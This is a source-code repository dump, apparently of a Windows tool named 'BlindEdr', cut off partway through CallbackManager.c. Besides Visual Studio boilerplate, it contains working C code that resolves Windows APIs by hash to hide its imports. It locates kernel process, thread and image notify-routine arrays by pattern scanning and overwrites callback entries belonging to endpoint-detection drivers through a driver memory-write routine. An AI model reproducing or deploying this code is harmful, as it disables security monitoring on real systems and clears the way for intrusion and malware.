├── .gitattributes ├── .gitignore ├── BlindEdr.sln ├── BlindEdr ├── ApiHashing.c ├── ApiHashing.h ├── BlindEdr.vcxproj ├── BlindEdr.vcxproj.filters ├── CallbackManager.c ├── Common.c ├── Common.h ├── Context.c ├── Debug.h ├── Disclaimer.h ├── DriverNameUtils.c ├── EDRDetector.c ├── FilterCallbackManager.c ├── FunctionPointers.h ├── IatCamo.h ├── ObjectCallbackManager.c ├── RegistryCallbackManager.c ├── RemoveCallBacks.h ├── Structs.h └── main.c ├── CityHash-Calc ├── CityHash-Calc.vcxproj ├── CityHash-Calc.vcxproj.filters └── main.cpp ├── LICENSE ├── README.assets ├── Snipaste_2025-01-15_14-30-45.png ├── Snipaste_2025-01-15_14-31-57.png ├── Snipaste_2025-01-15_14-32-44.png ├── Snipaste_2025-01-15_14-33-09.png ├── Snipaste_2025-01-15_14-33-32.png ├── Snipaste_2025-01-15_14-37-22.png ├── Snipaste_2025-01-15_14-37-32.png ├── Snipaste_2025-01-15_14-38-35.png ├── Snipaste_2025-01-15_14-39-41.png └── Snipaste_2025-01-15_14-40-43.png └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /BlindEdr.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.11.35327.3 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BlindEdr", "BlindEdr\BlindEdr.vcxproj", "{3D2758B4-90AE-430E-AB62-132977F16964}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CityHash-Calc", "CityHash-Calc\CityHash-Calc.vcxproj", "{5636B03E-D33B-49E6-9F00-F43689AC2E33}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {3D2758B4-90AE-430E-AB62-132977F16964}.Debug|x64.ActiveCfg = Debug|x64 19 | {3D2758B4-90AE-430E-AB62-132977F16964}.Debug|x64.Build.0 = Debug|x64 20 | {3D2758B4-90AE-430E-AB62-132977F16964}.Debug|x86.ActiveCfg = Debug|Win32 21 | {3D2758B4-90AE-430E-AB62-132977F16964}.Debug|x86.Build.0 = Debug|Win32 22 | {3D2758B4-90AE-430E-AB62-132977F16964}.Release|x64.ActiveCfg = Release|x64 23 | {3D2758B4-90AE-430E-AB62-132977F16964}.Release|x64.Build.0 = Release|x64 24 | {3D2758B4-90AE-430E-AB62-132977F16964}.Release|x86.ActiveCfg = Release|Win32 25 | {3D2758B4-90AE-430E-AB62-132977F16964}.Release|x86.Build.0 = Release|Win32 26 | {5636B03E-D33B-49E6-9F00-F43689AC2E33}.Debug|x64.ActiveCfg = Debug|x64 27 | {5636B03E-D33B-49E6-9F00-F43689AC2E33}.Debug|x64.Build.0 = Debug|x64 28 | {5636B03E-D33B-49E6-9F00-F43689AC2E33}.Debug|x86.ActiveCfg = Debug|Win32 29 | {5636B03E-D33B-49E6-9F00-F43689AC2E33}.Debug|x86.Build.0 = Debug|Win32 30 | {5636B03E-D33B-49E6-9F00-F43689AC2E33}.Release|x64.ActiveCfg = Release|x64 31 | {5636B03E-D33B-49E6-9F00-F43689AC2E33}.Release|x64.Build.0 = Release|x64 32 | {5636B03E-D33B-49E6-9F00-F43689AC2E33}.Release|x86.ActiveCfg = Release|Win32 33 | {5636B03E-D33B-49E6-9F00-F43689AC2E33}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {0A21D58A-EFB5-424E-807C-F20390995E5F} 40 | EndGlobalSection 41 | EndGlobal 42 | -------------------------------------------------------------------------------- /BlindEdr/ApiHashing.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include "Common.h" 4 | #include "Structs.h" 5 | 6 | 7 | #include "ApiHashing.h" 8 | #include "FunctionPointers.h" 9 | 10 | 11 | #define FIRST_HASH 0xcbf29ce484222325 12 | #define SECOND_HASH 0x100000001b3 13 | #define THIRD_HASH 0xff51afd7ed558ccd 14 | #define HASH_OFFSET 33 15 | 16 | 17 | UINT32 CityHash(LPCSTR cString) 18 | { 19 | int length = strlen(cString); 20 | UINT64 hash = FIRST_HASH; 21 | 22 | for (size_t i = 0; i < length; ++i) { 23 | hash ^= (UINT64)cString[i]; 24 | hash *= SECOND_HASH; 25 | } 26 | 27 | hash ^= hash >> HASH_OFFSET; 28 | hash *= THIRD_HASH; 29 | hash ^= hash >> HASH_OFFSET; 30 | 31 | return hash; 32 | } 33 | 34 | FARPROC GetProcAddressH(IN HMODULE hModule, IN UINT32 uApiHash) 35 | { 36 | PBYTE pBase = (PBYTE)hModule; 37 | PIMAGE_NT_HEADERS pImgNtHdrs = NULL; 38 | PIMAGE_EXPORT_DIRECTORY pImgExpdir = NULL; 39 | PDWORD pdwFunctionNameArray = NULL; 40 | PDWORD pdwFunctionAddressArray = NULL; 41 | PWORD pwFunctionOrdinalArray = NULL; 42 | DWORD dwImgExportDirSize = 0x00; 43 | 44 | // Check for invalid module or hash 45 | if (!hModule || !uApiHash) 46 | { 47 | PRINT("GetProcessAddressH Failed!!"); 48 | return NULL; 49 | } 50 | 51 | // Get the NT headers of the module 52 | pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + ((PIMAGE_DOS_HEADER)pBase)->e_lfanew); 53 | if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) { 54 | return NULL; 55 | } 56 | 57 | // Get the export directory and related arrays 58 | pImgExpdir = (PIMAGE_EXPORT_DIRECTORY)(pBase + pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 59 | dwImgExportDirSize = pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; 60 | pdwFunctionNameArray = (PDWORD)(pBase + pImgExpdir->AddressOfNames); 61 | pdwFunctionAddressArray = (PDWORD)(pBase + pImgExpdir->AddressOfFunctions); 62 | pwFunctionOrdinalArray = (PWORD)(pBase + pImgExpdir->AddressOfNameOrdinals); 63 | 64 | // Iterate over all exported functions 65 | for (DWORD i = 0; i < pImgExpdir->NumberOfFunctions; i++) { 66 | 67 | CHAR* pFunctionName = (CHAR*)(pBase + pdwFunctionNameArray[i]); 68 | PVOID pFunctionAddress = (PVOID)(pBase + pdwFunctionAddressArray[pwFunctionOrdinalArray[i]]); 69 | 70 | // Check if the hash matches 71 | if (CHASH(pFunctionName) == uApiHash) { 72 | 73 | // Handle forwarded functions 74 | if ((((ULONG_PTR)pFunctionAddress) >= ((ULONG_PTR)pImgExpdir)) && 75 | (((ULONG_PTR)pFunctionAddress) < ((ULONG_PTR)pImgExpdir) + dwImgExportDirSize) 76 | ) { 77 | 78 | CHAR cForwarderName[MAX_PATH] = { 0 }; 79 | DWORD dwDotOffset = 0x00; 80 | PCHAR pcFunctionMod = NULL; 81 | PCHAR pcFunctionName = NULL; 82 | 83 | // Copy the forwarder name 84 | Memcpy(cForwarderName, pFunctionAddress, strlen((PCHAR)pFunctionAddress)); 85 | 86 | // Find the dot in the forwarder name 87 | for (int i = 0; i < strlen((PCHAR)cForwarderName); i++) { 88 | 89 | if (((PCHAR)cForwarderName)[i] == '.') { 90 | dwDotOffset = i; 91 | cForwarderName[i] = NULL; 92 | break; 93 | } 94 | } 95 | 96 | pcFunctionMod = cForwarderName; 97 | pcFunctionName = cForwarderName + dwDotOffset + 1; 98 | 99 | // Load the library and get the function address 100 | fnLoadLibraryA pLoadLibraryA = (fnLoadLibraryA)GetProcAddressH(GetModuleHandleH(kernel32dll_CH, FALSE), LoadLibraryA_CH); 101 | if (pLoadLibraryA) 102 | return GetProcAddressH(pLoadLibraryA(pcFunctionMod), CHASH(pcFunctionName)); 103 | } 104 | return (FARPROC)pFunctionAddress; 105 | } 106 | 107 | } 108 | 109 | return NULL; 110 | } 111 | 112 | HMODULE GetModuleHandleH(IN UINT32 uModuleHash, IN BOOL isKernel) { 113 | if (isKernel) { 114 | // For kernel modules, use NtQuerySystemInformation 115 | PRTL_PROCESS_MODULES ModuleInfo = NULL; 116 | NTSTATUS status = 0; 117 | HMODULE result = NULL; 118 | 119 | // Allocate buffer for module info 120 | ModuleInfo = (PRTL_PROCESS_MODULES)calloc(1024 * 1024, 1); 121 | if (ModuleInfo == NULL) { 122 | return NULL; 123 | } 124 | 125 | // Query system modules 126 | status = NtQuerySystemInformation( 127 | SystemModuleInformation, 128 | ModuleInfo, 129 | 1024 * 1024, 130 | NULL 131 | ); 132 | 133 | if (!NT_SUCCESS(status)) { 134 | free(ModuleInfo); 135 | return NULL; 136 | } 137 | 138 | // Iterate through kernel modules 139 | for (ULONG i = 0; i < ModuleInfo->NumberOfModules; i++) { 140 | CHAR* moduleName = (CHAR*)(ModuleInfo->Modules[i].FullPathName + 141 | ModuleInfo->Modules[i].OffsetToFileName); 142 | 143 | // Convert to lowercase and check hash 144 | CHAR lowerName[MAX_PATH] = {0}; 145 | strncpy_s(lowerName, MAX_PATH, moduleName, _TRUNCATE); 146 | _strlwr_s(lowerName, MAX_PATH); 147 | 148 | if (CHASH(lowerName) == uModuleHash) { 149 | result = (HMODULE)ModuleInfo->Modules[i].ImageBase; 150 | break; 151 | } 152 | } 153 | 154 | free(ModuleInfo); 155 | return result; 156 | } 157 | else { 158 | // Original user-mode module lookup code 159 | PPEB pPeb = (PPEB)__readgsqword(0x60); 160 | PPEB_LDR_DATA pLdr = (PPEB_LDR_DATA)(pPeb->LoaderData); 161 | PLDR_DATA_TABLE_ENTRY pDte = (PLDR_DATA_TABLE_ENTRY)(pLdr->InMemoryOrderModuleList.Flink); 162 | 163 | // Return the handle of the local .exe image if no hash is provided 164 | if (!uModuleHash) { 165 | return (HMODULE)(pDte->InInitializationOrderLinks.Flink); 166 | } 167 | 168 | if (uModuleHash == advapi32dll_CH) { 169 | HMODULE hAdvapi32 = LoadLibraryA("advapi32.dll"); 170 | if (hAdvapi32) { 171 | PRINT("Successfully loaded advapi32.dll at 0x%p\n", hAdvapi32); 172 | return hAdvapi32; 173 | } 174 | } 175 | 176 | // Iterate over the loaded modules 177 | while (pDte) { 178 | if (pDte->FullDllName.Buffer && pDte->FullDllName.Length < MAX_PATH) { 179 | CHAR cLDllName[MAX_PATH] = { 0 }; 180 | SIZE_T x = 0; 181 | 182 | // Convert the DLL name to lowercase 183 | while (pDte->FullDllName.Buffer[x] && x < MAX_PATH - 1) { 184 | WCHAR wC = pDte->FullDllName.Buffer[x]; 185 | cLDllName[x] = (wC >= L'A' && wC <= L'Z') ? 186 | (CHAR)(wC - L'A' + L'a') : (CHAR)wC; 187 | x++; 188 | } 189 | 190 | if (CHASH(cLDllName) == uModuleHash) { 191 | return (HMODULE)(pDte->InInitializationOrderLinks.Flink); 192 | } 193 | } 194 | 195 | pDte = *(PLDR_DATA_TABLE_ENTRY*)(pDte); 196 | } 197 | 198 | // If not found, try to load it 199 | PRINT("Module with hash 0x%08x not found\n", uModuleHash); 200 | return NULL; 201 | } 202 | } -------------------------------------------------------------------------------- /BlindEdr/ApiHashing.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Common Function City hash 4 | #define LoadLibraryExA_CH 0xE4B4B3BE 5 | #define LoadLibraryA_CH 0x64DD6C03 6 | 7 | // DLL name City hash 8 | #define kernel32dll_CH 0xD009B80C 9 | #define advapi32dll_CH 0xEF149922 10 | 11 | 12 | // Essential Function 13 | #define OpenProcessToken_CH 0x7C37481F 14 | #define LookupPrivilegeValueA_CH 0x893E9289 15 | #define AdjustTokenPrivileges_CH 0x3D660B5D 16 | #define FLTMGRSYS_CH 0x44B3C584 17 | #define NTOSKRNLEXE_CH 0x4D75420E 18 | #define FltEnumerateFilters_CH 0x97B9D79D 19 | #define NtDuplicateObject_CH 0x99D79FFF 20 | #define NtOpenThreadTokenEx_CH 0xD5966046 21 | #define CmUnRegisterCallback_CH 0x5DB9C22C 22 | #define PsSetCreateProcessNotifyRoutine_CH 0x7676A5F2 23 | #define PsSetCreateThreadNotifyRoutine_CH 0xF12F24DA 24 | #define PsSetLoadImageNotifyRoutine_CH 0x6783E0E8 25 | 26 | // ApiHashing 27 | UINT32 CityHash(LPCSTR cString); 28 | #define CHASH(STR) ( CityHash( (LPCSTR)STR ) ) 29 | 30 | -------------------------------------------------------------------------------- /BlindEdr/BlindEdr.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {3d2758b4-90ae-430e-ab62-132977f16964} 25 | BlindEdr 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | false 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | false 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | None 122 | MultiThreaded 123 | true 124 | MaxSpeed 125 | false 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | ntdll.lib;$(CoreLibraryDependencies);%(AdditionalDependencies) 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | -------------------------------------------------------------------------------- /BlindEdr/BlindEdr.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {93d07cb2-cb1c-4d6a-8ad1-bb9093fb9d58} 18 | 19 | 20 | {5e9c20be-4da5-4334-b282-c8e28c054e6e} 21 | 22 | 23 | 24 | 25 | Source Files 26 | 27 | 28 | Common 29 | 30 | 31 | Common 32 | 33 | 34 | Common 35 | 36 | 37 | Common 38 | 39 | 40 | Common 41 | 42 | 43 | BlindEDR 44 | 45 | 46 | BlindEDR 47 | 48 | 49 | BlindEDR 50 | 51 | 52 | BlindEDR 53 | 54 | 55 | 56 | 57 | Header Files 58 | 59 | 60 | Header Files 61 | 62 | 63 | Header Files 64 | 65 | 66 | Header Files 67 | 68 | 69 | Header Files 70 | 71 | 72 | Header Files 73 | 74 | 75 | Header Files 76 | 77 | 78 | Header Files 79 | 80 | 81 | -------------------------------------------------------------------------------- /BlindEdr/CallbackManager.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "Structs.h" 3 | 4 | #include "RemoveCallBacks.h" 5 | 6 | #include "stdio.h" 7 | 8 | 9 | // Process and clear EDR callbacks if needed 10 | VOID ProcessDriverCallback(INT64 baseAddr, UINT64 index, INT64 driverAddr, BYTE* data) { 11 | // Validate input parameters 12 | if (!baseAddr || !data || !driverAddr) { 13 | return; 14 | } 15 | 16 | // Calculate target address once to avoid multiple calculations 17 | PVOID targetAddr = (PVOID)(baseAddr + (index * 8)); 18 | 19 | // Get and validate driver name 20 | CHAR* driverName = GetDriverName(driverAddr); 21 | if (!driverName) { 22 | return; 23 | } 24 | 25 | 26 | // Print driver information and handle EDR detection 27 | 28 | PRINT("%s", driverName); 29 | 30 | if (IsEDRHash(driverName)) { 31 | // Clear EDR callback entry 32 | DriverMemoryOperation(data, targetAddr, 8, MEMORY_WRITE); 33 | PRINT("\t[Clear]\n"); 34 | } else { 35 | PRINT("\n"); 36 | } 37 | } 38 | 39 | INT64 GetPspNotifyRoutineArrayH(UINT32 KernelCallbackRegFuncHash) { 40 | BYTE* buffer = (BYTE*)malloc(1); 41 | DWORD dwMajor = GetNtVersion(); 42 | UINT64 offset = 0; 43 | UINT64 PspOffset = 0; 44 | UINT64 PspSetCallbackssNotifyRoutineAddress = 0; 45 | 46 | UINT64 PsSetCallbacksNotifyRoutineAddress = GetFuncAddressH(NTOSKRNLEXE_CH, KernelCallbackRegFuncHash); 47 | 48 | if (!PsSetCallbacksNotifyRoutineAddress) { 49 | PRINT("Can't get the address!\n"); 50 | return 0; 51 | } 52 | 53 | // For Win10 or Win8/8.1 process callbacks 54 | if (dwMajor >= 10 || (dwMajor == 6 && (KernelCallbackRegFuncHash == PsSetCreateProcessNotifyRoutine_CH) )) { 55 | 56 | UINT64 callInstrAddr = FindPattern(PsSetCallbacksNotifyRoutineAddress, &PREDEFINED_PATTERNS[0], 200); 57 | 58 | // Calculate Offset 59 | offset = CalculateOffset(callInstrAddr, 0, 4); 60 | 61 | PspSetCallbackssNotifyRoutineAddress = callInstrAddr + offset + 5; 62 | 63 | } 64 | else if (dwMajor == 6) { // Win7/8 65 | PspSetCallbackssNotifyRoutineAddress = PsSetCallbacksNotifyRoutineAddress; 66 | } 67 | else { 68 | return 0; // Unsupported OS version 69 | } 70 | 71 | PRINT("Target VA: 0x%p\r\n", (PVOID)PspSetCallbackssNotifyRoutineAddress); 72 | 73 | 74 | offset = 0; 75 | 76 | 77 | UINT64 leaInstrAddr = FindPattern(PspSetCallbackssNotifyRoutineAddress, &PREDEFINED_PATTERNS[1], 200); 78 | 79 | // Calculate final offset 80 | 81 | offset = CalculateOffset(leaInstrAddr, 2, 6); 82 | 83 | // Calculate array VA 84 | // 